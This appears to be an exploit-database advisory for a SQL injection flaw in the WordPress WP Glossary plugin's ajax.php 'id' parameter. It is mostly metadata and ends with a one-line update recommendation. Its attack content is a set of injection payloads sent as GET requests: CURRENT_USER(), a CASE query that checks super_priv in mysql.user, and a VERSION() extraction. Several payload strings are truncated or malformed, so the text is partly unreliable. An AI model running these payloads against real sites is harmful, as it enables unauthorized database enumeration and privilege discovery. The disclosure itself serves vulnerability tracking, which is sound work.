vendor:
WP Glossary
by:
longrifle0x
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WP Glossary
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: a:wordpress:wordpress
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011
WordPress WP Glossary plugin SQL Injection Vulnerability
Discovered a vulnerability in WP Glossary, Wordpress Plugin, vulnerability is SQL injection. File: wp-content/plugins/wp-glossary/ajax.php Exploit: id=-1; or 1=if Exploitation: http://localhost:80/wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][CURRENT_USER() http://localhost:80/wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://localhost:80/wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
Mitigation:
Update to the latest version of the plugin and ensure that all plugins are up to date.
